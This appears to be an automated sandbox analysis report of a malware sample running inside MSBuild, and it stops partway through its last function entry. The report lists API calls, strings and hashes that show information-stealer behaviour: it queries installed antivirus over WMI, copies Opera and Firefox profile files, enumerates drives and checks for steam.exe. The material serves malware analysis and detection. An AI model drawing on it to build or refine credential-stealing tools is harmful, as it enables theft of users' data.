HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00406AAC
InternetReadFile.WININET(?,?,000007CF,?), ref: 00406B40
InternetCloseHandle.WININET(?), ref: 00406B50
InternetCloseHandle.WININET(?), ref: 00406B5C
InternetCloseHandle.WININET(?), ref: 00406B68

Part of subcall function 004105DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00417228,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 004105F2
Part of subcall function 004105DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00417228,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 0041061A
Part of subcall function 004105DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00417228,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 00410625

Part of subcall function 00410562: lstrcpyA.KERNEL32(00000000,?,00000000,00417246,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 00410592

Strings

GET, xrefs: 00406A42
@iA, xrefs: 00406976
ERROR, xrefs: 00406AB6
ERROR, xrefs: 00406BAB

Memory Dump Source

Source File: 00000002.00000002.2515562170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2515562170.0000000000481000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004E4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000503000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000059C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000065D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$CloseHandleHttp$OpenRequestlstrlen$ConnectCrackFileInfoOptionQueryReadSendlstrcat
String ID: @iA$ERROR$ERROR$GET
API String ID: 3863758870-3546687611
Opcode ID: 4259de1d54f0bc04615017c30821920a739c43fd75e421c8ed8dd8244f809a90
Instruction ID: ef172601904a3a7ca93e7681dc83e5257d06185729263716e5f85be6783c8942
Opcode Fuzzy Hash: 4259de1d54f0bc04615017c30821920a739c43fd75e421c8ed8dd8244f809a90
Instruction Fuzzy Hash: BA51A0B1A00269AFDF20AF20DC85AEEB7B9FB04344F0181F6F549B2191CA755EC59F84

Function 0041196C Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 114comCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 00411973
CoInitializeEx.OLE32(00000000,00000000,00000030,00413FA7,?,AV: ,004368CC,Install Date: ,004368B8,00000000,Windows: ,004368A8,Work Dir: In memory,00436890), ref: 00411982
CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00411993
CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 004119AD
CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 004119E3
VariantInit.OLEAUT32(?), ref: 00411A32

Part of subcall function 00411D17: LocalAlloc.KERNEL32(00000040,00000005,?,?,00411A55,?), ref: 00411D1F
Part of subcall function 00411D17: CharToOemW.USER32(?,00000000), ref: 00411D2B

Part of subcall function 004104BC: lstrcpyA.KERNEL32(00000000,00000000,?,00417207,004366BA,?,?,?,?,0041871B), ref: 004104E2

VariantClear.OLEAUT32(?), ref: 00411A60

Strings

Unknown, xrefs: 00411A75
Select * From AntiVirusProduct, xrefs: 004119F8
Unknown, xrefs: 00411A6E
WQL, xrefs: 004119FD
displayName, xrefs: 00411A44
root\SecurityCenter2, xrefs: 004119C5
Unknown, xrefs: 00411A89

Memory Dump Source

Source File: 00000002.00000002.2515562170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2515562170.0000000000481000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004E4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000503000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000059C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000065D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: InitializeVariant$AllocBlanketCharClearCreateH_prolog3_catchInitInstanceLocalProxySecuritylstrcpy
String ID: Select * From AntiVirusProduct$Unknown$Unknown$Unknown$WQL$displayName$root\SecurityCenter2
API String ID: 4288110179-315474579
Opcode ID: 880e3c2cd8f1c0728c4455d015b4fe117c86c60a485dab9625a348f0709e0780
Instruction ID: d1800e6a3f5e87e096ab3541814be36dedfffd727dbdbed4cda2aaabcb688f62
Opcode Fuzzy Hash: 880e3c2cd8f1c0728c4455d015b4fe117c86c60a485dab9625a348f0709e0780
Instruction Fuzzy Hash: B6314371A40209BBCB20DB91DC49EDFBF7DEFC9B10F20525AF211A61A0C6795941CB28

Function 00401D80 Relevance: 23.3, APIs: 12, Strings: 1, Instructions: 529fileCOMMON

Download Yara Rule

APIs

Part of subcall function 004104BC: lstrcpyA.KERNEL32(00000000,00000000,?,00417207,004366BA,?,?,?,?,0041871B), ref: 004104E2

FindFirstFileA.KERNEL32(?,?,0043AA58,0043AA5C,004369EE,004369EB,00417A94,?,00000000), ref: 00401FA4
StrCmpCA.SHLWAPI(?,0043AA60), ref: 00401FD7
StrCmpCA.SHLWAPI(?,0043AA64), ref: 00401FF1
FindFirstFileA.KERNEL32(?,?,0043AA68,0043AA6C,?,0043AA70,004369EF), ref: 004020DD
CopyFileA.KERNEL32(?,?,00000001), ref: 004022C3

Part of subcall function 00411D91: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DD2

Part of subcall function 0041059C: lstrcpyA.KERNEL32(00000000,?,0000000C,00417775,004366D6), ref: 004105CA
Part of subcall function 0041059C: lstrcatA.KERNEL32(?,?), ref: 004105D4

Part of subcall function 00410562: lstrcpyA.KERNEL32(00000000,?,00000000,00417246,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 00410592

DeleteFileA.KERNEL32(?), ref: 00402336
FindNextFileA.KERNEL32(?,?), ref: 004023A2
FindClose.KERNEL32(?), ref: 004023B6
CopyFileA.KERNEL32(?,?,00000001), ref: 004025DC

Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E72B,?,?,?), ref: 00407FC7
Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E72B,?,?,?), ref: 00407FDE
Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E72B,?,?,?), ref: 00407FF5
Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E72B,?,?,?), ref: 0040800C
Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E72B,?,?,?), ref: 00408034

DeleteFileA.KERNEL32(?), ref: 0040264F

Part of subcall function 00417023: Sleep.KERNEL32(000003E8,?,?), ref: 0041708A

FindNextFileA.KERNEL32(?,?), ref: 004026C6
FindClose.KERNEL32(?), ref: 004026DA

Part of subcall function 004104EE: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,004177AD), ref: 0041050D

Part of subcall function 00417023: CreateThread.KERNEL32(00000000,00000000,00416F52,?,00000000,00000000), ref: 004170C2
Part of subcall function 00417023: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 004170CA

Part of subcall function 004105DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00417228,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 004105F2
Part of subcall function 004105DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00417228,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 0041061A
Part of subcall function 004105DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00417228,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 00410625

Part of subcall function 00411D67: GetFileAttributesA.KERNEL32(?,?,?,0040DA54,?,?,?), ref: 00411D6E

Part of subcall function 00411C1F: GetSystemTime.KERNEL32(?,004366E2,?), ref: 00411C4E

Strings

\*.*, xrefs: 00401E9E

Memory Dump Source

Source File: 00000002.00000002.2515562170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2515562170.0000000000481000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004E4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000503000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000059C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000065D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: File$Find$lstrcpy$Close$CopyCreateDeleteFirstNextlstrcat$AllocAttributesFolderHandleLocalObjectPathReadSingleSizeSleepSystemThreadTimeWaitlstrlen
String ID: \*.*
API String ID: 1475085387-1173974218
Opcode ID: ddd36cf5883c05c2e99f8e8a3ef304cdccdfafc04dcae60c5929c9384b510419
Instruction ID: 3d46fa51890fdd32098865e919ef6b5fd5a0840b5da96ce08d22a13f78ff4c56
Opcode Fuzzy Hash: ddd36cf5883c05c2e99f8e8a3ef304cdccdfafc04dcae60c5929c9384b510419
Instruction Fuzzy Hash: 2532DC71A001299BCF21FB25DD4A7CD7375AF04308F5151EAA548771A2CBB8AFC98F89

Function 0041547D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 140stringfileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 004154AA
FindFirstFileA.KERNEL32(?,?), ref: 004154C1
StrCmpCA.SHLWAPI(?,00436A88), ref: 004154E2
StrCmpCA.SHLWAPI(?,00436A8C), ref: 004154FC
lstrcatA.KERNEL32(?), ref: 0041554D
lstrcatA.KERNEL32(?), ref: 00415560
lstrcatA.KERNEL32(?,?), ref: 00415574
lstrcatA.KERNEL32(?,?), ref: 00415587
lstrcatA.KERNEL32(?,00436A90), ref: 00415599
lstrcatA.KERNEL32(?,?), ref: 004155AD

Part of subcall function 004104BC: lstrcpyA.KERNEL32(00000000,00000000,?,00417207,004366BA,?,?,?,?,0041871B), ref: 004104E2

Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E72B,?,?,?), ref: 00407FC7
Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E72B,?,?,?), ref: 00407FDE
Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E72B,?,?,?), ref: 00407FF5
Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E72B,?,?,?), ref: 0040800C
Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E72B,?,?,?), ref: 00408034

Part of subcall function 00417023: CreateThread.KERNEL32(00000000,00000000,00416F52,?,00000000,00000000), ref: 004170C2
Part of subcall function 00417023: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 004170CA

FindNextFileA.KERNEL32(?,?), ref: 00415663
FindClose.KERNEL32(?), ref: 00415677

Strings

%s\%s, xrefs: 0041549E

Memory Dump Source

Source File: 00000002.00000002.2515562170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2515562170.0000000000481000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004E4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000503000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000059C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000065D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcat$File$Find$CloseCreate$AllocFirstHandleLocalNextObjectReadSingleSizeThreadWaitlstrcpywsprintf
String ID: %s\%s
API String ID: 1150833511-4073750446
Opcode ID: 43a62a5da0811069e516dd251f062bdd047ec93f171ae9359a6db0a91eb6ec6d
Instruction ID: 1d3312f9eb8f2264bd1265c82754d6ca2f0579c4a6faf9a3c0b83cff55796419
Opcode Fuzzy Hash: 43a62a5da0811069e516dd251f062bdd047ec93f171ae9359a6db0a91eb6ec6d
Instruction Fuzzy Hash: 28513DB1D0021D9BCF64DF60DC89AC9B7BDAB49305F0045EAE609E3250EB359B85CF69

Function 0040BF22 Relevance: 19.7, APIs: 7, Strings: 4, Instructions: 420fileCOMMON

Download Yara Rule

APIs

Part of subcall function 004104BC: lstrcpyA.KERNEL32(00000000,00000000,?,00417207,004366BA,?,?,?,?,0041871B), ref: 004104E2

Part of subcall function 0041059C: lstrcpyA.KERNEL32(00000000,?,0000000C,00417775,004366D6), ref: 004105CA
Part of subcall function 0041059C: lstrcatA.KERNEL32(?,?), ref: 004105D4

Part of subcall function 004105DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00417228,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 004105F2
Part of subcall function 004105DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00417228,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 0041061A
Part of subcall function 004105DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00417228,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 00410625

Part of subcall function 00410562: lstrcpyA.KERNEL32(00000000,?,00000000,00417246,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 00410592

FindFirstFileA.KERNEL32(?,?,\*.*,0043682E,0040CC40,?,?), ref: 0040BF9A
StrCmpCA.SHLWAPI(?,00437468), ref: 0040BFBA
StrCmpCA.SHLWAPI(?,0043746C), ref: 0040BFD4
StrCmpCA.SHLWAPI(?,Opera,0043683B,0043683A,00436837,00436836,00436833,00436832,0043682F), ref: 0040C060
StrCmpCA.SHLWAPI(?,Opera GX), ref: 0040C06E
StrCmpCA.SHLWAPI(?,Opera Crypto), ref: 0040C07C

Strings

Opera, xrefs: 0040C058
\*.*, xrefs: 0040BF48
Opera GX, xrefs: 0040C066
Opera Crypto, xrefs: 0040C074

Memory Dump Source

Source File: 00000002.00000002.2515562170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2515562170.0000000000481000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004E4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000503000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000059C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000065D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
String ID: Opera$Opera Crypto$Opera GX$\*.*
API String ID: 2567437900-1710495004
Opcode ID: 641a2c03c4c46291d02ed1cbb88d1bb21ca57062de13db32c816f54babdabdfb
Instruction ID: ac1e4222586fa4afca2114cb34797cbe6f2b8c51e5762f012ace873438baa98d
Opcode Fuzzy Hash: 641a2c03c4c46291d02ed1cbb88d1bb21ca57062de13db32c816f54babdabdfb
Instruction Fuzzy Hash: A7021C71A001299BCB21FB26DD466CD7775AF14308F4151EBB948B3191DBB86FC98F88

Function 00415182 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 146stringCOMMON

Download Yara Rule

APIs

GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 00415202
_memset.LIBCMT ref: 00415225
GetDriveTypeA.KERNEL32(?), ref: 0041522E
lstrcpyA.KERNEL32(?,?), ref: 0041524E
lstrcpyA.KERNEL32(?,?), ref: 00415269

Part of subcall function 00414D08: wsprintfA.USER32 ref: 00414D5C
Part of subcall function 00414D08: FindFirstFileA.KERNEL32(?,?), ref: 00414D73
Part of subcall function 00414D08: _memset.LIBCMT ref: 00414D8F
Part of subcall function 00414D08: _memset.LIBCMT ref: 00414DA0
Part of subcall function 00414D08: StrCmpCA.SHLWAPI(?,00436A00), ref: 00414DC1
Part of subcall function 00414D08: StrCmpCA.SHLWAPI(?,00436A04), ref: 00414DDB
Part of subcall function 00414D08: wsprintfA.USER32 ref: 00414E02
Part of subcall function 00414D08: StrCmpCA.SHLWAPI(?,0043660F), ref: 00414E16
Part of subcall function 00414D08: wsprintfA.USER32 ref: 00414E3F
Part of subcall function 00414D08: _memset.LIBCMT ref: 00414E68
Part of subcall function 00414D08: lstrcatA.KERNEL32(?,?), ref: 00414E7D

lstrcpyA.KERNEL32(?,00000000), ref: 0041528A
lstrlenA.KERNEL32(?), ref: 00415304

Strings

%DRIVE_FIXED%, xrefs: 00415270
*%DRIVE_FIXED%*, xrefs: 0041519E
%DRIVE_REMOVABLE%, xrefs: 00415255
*%DRIVE_REMOVABLE%*, xrefs: 004151CF

Memory Dump Source

Source File: 00000002.00000002.2515562170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2515562170.0000000000481000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004E4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000503000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000059C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000065D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: _memset$lstrcpywsprintf$Drive$FileFindFirstLogicalStringsTypelstrcatlstrlen
String ID: %DRIVE_FIXED%$%DRIVE_REMOVABLE%$*%DRIVE_FIXED%*$*%DRIVE_REMOVABLE%*
API String ID: 441469471-147700698
Opcode ID: dc809dd23139fb68ca2e12e265e3b71085f967899d686391cfb859ef9c95129b
Instruction ID: 7f19d13716cb32b355131421ed1edec5ae4476b9c202b44ef05ea067ce6d973c
Opcode Fuzzy Hash: dc809dd23139fb68ca2e12e265e3b71085f967899d686391cfb859ef9c95129b
Instruction Fuzzy Hash: 3B512DB190021CAFDF219FA4DC85BDE7BB9FB05304F1041AAEA08A7111E7355E89CF59

Function 0040D59B Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 229fileCOMMON

Download Yara Rule

APIs

Part of subcall function 004104BC: lstrcpyA.KERNEL32(00000000,00000000,?,00417207,004366BA,?,?,?,?,0041871B), ref: 004104E2

Part of subcall function 0041059C: lstrcpyA.KERNEL32(00000000,?,0000000C,00417775,004366D6), ref: 004105CA
Part of subcall function 0041059C: lstrcatA.KERNEL32(?,?), ref: 004105D4

Part of subcall function 004105DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00417228,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 004105F2
Part of subcall function 004105DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00417228,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 0041061A
Part of subcall function 004105DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00417228,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 00410625

Part of subcall function 00410562: lstrcpyA.KERNEL32(00000000,?,00000000,00417246,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 00410592

FindFirstFileA.KERNEL32(?,?,00437568,00436887,?,?,?), ref: 0040D61C
StrCmpCA.SHLWAPI(?,0043756C), ref: 0040D63D
StrCmpCA.SHLWAPI(?,00437570), ref: 0040D657
StrCmpCA.SHLWAPI(?,prefs.js,00437574,?,0043688F), ref: 0040D6E3

Part of subcall function 00411C1F: GetSystemTime.KERNEL32(?,004366E2,?), ref: 00411C4E

CopyFileA.KERNEL32(?,?,00000001), ref: 0040D7BD
DeleteFileA.KERNEL32(?), ref: 0040D888
FindNextFileA.KERNELBASE(?,?), ref: 0040D92B
FindClose.KERNEL32(?), ref: 0040D93F

Strings

prefs.js, xrefs: 0040D6D7

Memory Dump Source

Source File: 00000002.00000002.2515562170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2515562170.0000000000481000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004E4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000503000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000059C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000065D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextSystemTimelstrlen
String ID: prefs.js
API String ID: 893096357-3783873740
Opcode ID: 4402ba1984588b0d33ead1db6d97b348ed726ec1ad9f394c151d1388e7e72f05
Instruction ID: c3c0316d953dd00db375bed31a8349bc811e2f6ff6ed0aa7aecf8a221778b14b
Opcode Fuzzy Hash: 4402ba1984588b0d33ead1db6d97b348ed726ec1ad9f394c151d1388e7e72f05
Instruction Fuzzy Hash: BDA10971E002289BDB60FB25DD46BCD7775AF04305F4141EAB908B7291DB78AEC98F89

Function 0040B5B4 Relevance: 13.7, APIs: 9, Instructions: 217fileCOMMON

Download Yara Rule

APIs

Part of subcall function 004104BC: lstrcpyA.KERNEL32(00000000,00000000,?,00417207,004366BA,?,?,?,?,0041871B), ref: 004104E2

Part of subcall function 0041059C: lstrcpyA.KERNEL32(00000000,?,0000000C,00417775,004366D6), ref: 004105CA
Part of subcall function 0041059C: lstrcatA.KERNEL32(?,?), ref: 004105D4

Part of subcall function 004105DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00417228,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 004105F2
Part of subcall function 004105DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00417228,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 0041061A
Part of subcall function 004105DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00417228,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 00410625

Part of subcall function 00410562: lstrcpyA.KERNEL32(00000000,?,00000000,00417246,00436C20,00000000,004366BA,?,?,?,?,0041871B), ref: 00410592

FindFirstFileA.KERNEL32(?,?,0043741C,00436822,?,?,?), ref: 0040B62C
StrCmpCA.SHLWAPI(?,00437420), ref: 0040B64D
StrCmpCA.SHLWAPI(?,00437424), ref: 0040B667
StrCmpCA.SHLWAPI(?,00437428,?,00436823), ref: 0040B6F4
StrCmpCA.SHLWAPI(?), ref: 0040B755

Part of subcall function 004104EE: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,004177AD), ref: 0041050D

Part of subcall function 0040ABBA: CopyFileA.KERNEL32(?,?,00000001), ref: 0040AC5F

FindNextFileA.KERNELBASE(?,?), ref: 0040B8C0
FindClose.KERNEL32(?), ref: 0040B8D4

Memory Dump Source

Source File: 00000002.00000002.2515562170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2515562170.0000000000481000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004E4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000503000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000059C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000065D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileFind$lstrcat$CloseCopyFirstNextlstrlen
String ID:
API String ID: 3801961486-0
Opcode ID: 934c5d852c5524fd99b6ee12de2f26cbb8679899dab4ecb322a7774f444f2f9d
Instruction ID: d94592b5482352d0ec6da5ccc21028963815865da7d009450886e6cf31cbea76
Opcode Fuzzy Hash: 934c5d852c5524fd99b6ee12de2f26cbb8679899dab4ecb322a7774f444f2f9d
Instruction Fuzzy Hash: 01812C719006189BCB60FB32DD46ADD7778AF04308F4141AAED08B3291DB789ED98FD9

Function 0041247D Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 39processCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 00412487
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004124A9
Process32First.KERNEL32(00000000,00000128), ref: 004124B9
Process32Next.KERNEL32(00000000,00000128), ref: 004124CB
StrCmpCA.SHLWAPI(?,steam.exe), ref: 004124DD
CloseHandle.KERNEL32(00000000), ref: 004124F6

Strings

steam.exe, xrefs: 0041248C, 004124D5

Memory Dump Source

Source File: 00000002.00000002.2515562170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2515562170.0000000000481000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.00000000004E4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000503000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000059C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.000000000065D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2515562170.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstH_prolog3_catch_HandleNextSnapshotToolhelp32
String ID: steam.exe
API String ID: 1799959500-2826358650
Opcode ID: ecd3519e3741eaa470c35dcf05407402c1190084f799967f94555945819a9a86
Instruction ID: d4084f0d0e759edba7759444cd5962fa3e50233271c2a93f092f019bb47ce1b0
